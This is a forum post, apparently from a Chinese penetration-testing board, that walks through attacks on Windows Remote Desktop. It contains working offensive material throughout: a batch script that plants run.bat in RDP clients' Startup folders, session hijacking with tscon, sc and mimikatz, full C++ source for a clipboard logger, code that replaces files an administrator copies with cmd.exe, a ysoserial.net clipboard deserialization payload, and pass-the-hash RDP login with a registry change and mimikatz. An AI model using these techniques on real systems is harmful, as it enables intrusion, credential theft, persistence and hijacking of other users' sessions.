\\tsclient\c\users\*startup* echo|%dirs%|findstr /i 'Microsoft\Windows\Start Menu\Programs\Startup''%TEMP%\temp_00.txt' echo|%dirs2%|findstr /i 'Microsoft\Windows\Start Menu\Programs\Startup''%TEMP%\temp_00.txt' for /F 'tokens=*' %%a in (%TEMP%\temp_00.txt) DO ( copy run.bat '%%a' nul 21 copy C:\temp\run.bat '%%a' nul 21 copy \\tsclient\c\temp\run.bat '%%a' nul 21 ) del /q %TEMP%\temp_00.txt nul 21 REM if 'WINDOMAIN'='%USERDOMAIN%'( cmd.exe /c calc.exe ) RDP Session Hijacking The practical command is tscon, which is normal to switch to a different session through a password. However, under system, you can switch different user sessions without using a password. Switch a session to a different session. This technique is mainly aimed at win7 and above environments. The overall application scenario is: if Windows 2012 or above does not save plaintext by default, you can switch to the target host, or if the current user in the domain is a local user, you can switch to the domain user permissions. First, use psexec locally to mention the system. (Here you can create system services manually to implement them.) You can also use shift/Utilman backdoor to log in to the desktop without password. 1.psexec C:\Windows\system32quser Username Session Name ID Status Idle Time Login Time administrator rdp-tcp#1 1 is running. 2020/12/14 11:14 test rdp-tcp#0 2 running 1:02 2020/12/14 13:04 C:\Windows\system32tscon 2 rdp-tcp#1 2. Services quser sc create sesshijack binpath='cmd.exe /k tscon 2 /dest:rdp-tcp#1' net start sesshijack 3. mimikatz privilege:debug ts:sessions toekn:elevate ts:remote /id:2 4. Shift password-free hijacking com hijacking Shift backdoor in webshell rdpclip.exe utilization The RDP service can copy and paste text and files. It is mainly implemented through this rdpclip.exe process. If you want to know the specific operation in copying, you can use ClipSpy to view the changes in the clipboard. I saw many disclosed methods of using the copyright in ATTCK to obtain the text content of copy, and there is also an idea given in https://research.checkpoint.com/2019/reverse-rdp-attack-code-execution-on-rdp-clients/HOOK RDPClip.exe 1. Shear board monitoring Every 10 seconds, read the clipboard content and save it locally. #include exception #include iostream #include ostream #include stdexcept #include string #include windows.h #include fstream using namespace std; class RaiiClipboard { public: RaiiClipboard() { if (!OpenClipboard(NULL)) throw runtime_error('Can't open clipboard.'); //. or define some custom exception class for clipboard errors. } ~RaiiClipboard() { CloseClipboard(); } //Ban copy private: RaiiClipboard(const RaiiClipboard); RaiiClipboard operator=(const RaiiClipboard); }; class RaiiTextGlobalLock { public: explicit RaiiTextGlobalLock(HANDLE hData) : m_hData(hData) { m_psz=static_castconst char*(GlobalLock(m_hData)); if (!m_psz) throw runtime_error('Can't acquire lock on clipboard text.'); } ~RaiiTextGlobalLock() { GlobalUnlock(m_hData); } const char* Get() const { return m_psz; } private: HANDLE m_hData; const char* m_psz; //Ban copy RaiiTextGlobalLock(const RaiiTextGlobalLock); RaiiTextGlobalLock operator=(const RaiiTextGlobalLock); }; string GetClipboardText() { RaiiClipboard clipboard; HANDLE hData=GetClipboardData(CF_TEXT); if (hData==NULL) { return ''; //throw runtime_error('Can't get clipboard text.'); } RaiiTextGlobalLock textGlobalLock(hData); string text(textGlobalLock.Get()); return text; } void SaveData(string data) { ofstream out('info.txt', ios:app); if (out.is_open()) { out data + '\n'; out '------------------------------\n'; out.close(); } } int main() { static const int kExitOk=0; static const int kExitError=1; string data1=''; string data2=''; try { while (true) { data2=GetClipboardText(); if (data1 !=data2) { cout data2 endl; SaveData(data2); } else { cout 'waiting for clip acting.' endl; Sleep(300000); } data1=data2; Sleep(10000); } return kExitOk; } catch (const exception e) { cerr '*** ERROR: ' e.what() endl; return kExitError; } } According to the Cheesy Rumbles article. You can also use Get-ClipboardContents.ps1 to get clipboard content, and it can be obtained across multiple rdp interfaces. 3924 888 rdpclip.exe x64 3 DMZ2\rasta inject 3924 x64 smb powershell-import D:\Tools\Get-ClipboardContents.ps1 powershell Get-ClipboardContents -PollInterval 1 2. Counterattack rdp How to transfer files to the administrator in reverse without hanging disks? I found two methods online. 1. The Hook GetClipboardData function and DragQueryFileW function are similar. After two days of debugging, I finally found it with the help of all the brothers. 2. Later I thought that I could get the clipboard contents in the previous section, so I could modify the file he copied. CVE-2019-0887 Li Yongde has the same idea as given in paper. Since wcsrchr(szFile, '\') is used to receive addresses, Microsoft also supports./this kind of path. The reason for the vulnerability is similar to that of winrar path. Use the detours library to hook the GetClipboardData function and DragQueryFileW function, add file data and paths to achieve the final effect Replace clipboard file #include iostream #include windows.h #include shlobj.h int CopyFileToClipboard(char szFileName[]); int main() { CopyFileToClipboard('C:\\windows\\system32\\cmd.exe'); return 0; } int CopyFileToClipboard(char szFileName[]) { UINT uDropEffect; HGLOBAL hGblEffect; LPDWORD lpdDropEffect; DROPFILES stDrop; HGLOBAL hGblFiles; LPSTR lpData; uDropEffect=RegisterClipboardFormat('Preferred DropEffect'); hGblEffect=GlobalAlloc(GMEM_ZEROINIT | GMEM_MOVEABLE | GMEM_DDESHARE, sizeof(DWORD)); lpdDropEffect=(LPDWORD)GlobalLock(hGblEffect); *lpdDropEffect=DROPEFFECT_COPY;//Copy; Use DROPEFFECT_MOVE for scraping and pasting GlobalUnlock(hGblEffect); stDrop.pFiles=sizeof(DROPFILES); stDrop.pt.x=0; stDrop.pt.y=0; stDrop.fNC=FALSE; stDrop.fWide=FALSE; hGblFiles=GlobalAlloc(GMEM_ZEROINIT | GMEM_MOVEABLE | GMEM_DDESHARE, sizeof(DROPFILES) + strlen(szFileName) + 2); lpData=(LPSTR)GlobalLock(hGblFiles); memcpy(lpData, stDrop, sizeof(DROPFILES)); strcpy(lpData + sizeof(DROPFILES), szFileName); GlobalUnlock(hGblFiles); OpenClipboard(NULL); EmptyClipboard(); SetClipboardData(CF_HDROP, hGblFiles); SetClipboardData(uDropEffect, hGblEffect); CloseClipboard(); return 1; } In this way, after the administrator copies any file from the server and downloads it to the machine, the file will be replaced with cmd.exe .NET Deserialization See an idea introduced in `https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/december/beware-of-deserialisation-in-.net-methods-and-classes-code-execution-via-paste/`. (I never expected this way to play) Utilize `https://github.com/pwntester/ysoserial.net` The utilization process is to replace it with serialized code when pasting the clipboard. Deserialization operation will be triggered when some applications are pasted. Moreover, if the target .NET application is run with higher permissions, it can also be used as permission promotion. (The current user does not have a UAC account password, but the administrator has opened a .NET application before UAC.) ysoserial.exe -p Clipboard -c calc -F System.String Tested program: PowerShell ISE VS Drawing tools Any WPF application that utilizes TextBox, PasswordBox, or RichTextBox will also be affected. RDP pth User hash login on Windows Mstsc Server needs to be enabled Restricted Admin mode, which is enabled by default in Windows 8.1 Windows Server 2012 R2. At the same time, if Win 7 and Windows Server 2008 R are installed, 2871997 and 2973351 patches are also supported; Client needs to support Restricted Admin mode Turn on Restricted Admin mode REG ADD 'HKLM\System\CurrentControlSet\Control\Lsa' /v DisableRestrictedAdmin /t REG_DWORD /d 000000000 /f When enabled, use: mstsc.exe /restrictedadmin Login without password, the current user's hash will be used for verification Mimikatz mimikatz.exe privilege:debug sekurlsa:pth /user:fbiwarning /domain:172.16.142.136 /ntlm:44f9ea6a7743a8ea6f1956384c39887b '/run:mstsc.exe /restrictedadmin'
- 4月10日4月10日
- 6篇回复

总主题数 25.7k
总帖子数 25.9k

登录

Linux Kali高级学习教程

483个主题在此版面

LINUX KALI Psobf - PowerShell 混淆器

KALI怎么渗透网站的？这篇文章告诉你！

MSF

MSF免杀

kali 中使用 apt-get update 签名错误 invalid signature 的处理

Empire框架指南（一）

Ladon for Kali 2022

301重定向

ettercap获取http&https账号和密码

wpscan之信息收集

kali更新命令

分享一个在线编辑svg的网站

CVE-2018-1270 Remote Code Execution with spring-messaging

linux常用指令（目录操作）

WINDOWS7五步快速搭建Centos7环境

linux下相关操作

http与https区别和联系

Netcat基础

使用mysql自带工具mysqldump进行全库备份以及source命令恢复数据库

公网IP和内网IP

Who was online for 24 hours 6

Search

动态

针对 NPM Registry API 的新定时攻击可能会暴露私有包

研究人员详细介绍了网络间谍组织 Earth Aughisky 使用的恶意工具

新报告揭示了 Emotet 在近期攻击中使用的传递和规避技术

英特尔确认 Alder Lake BIOS 源代码泄露

前端拿到后端长整数数据精度失真问题

论坛统计

帐户

导航

搜索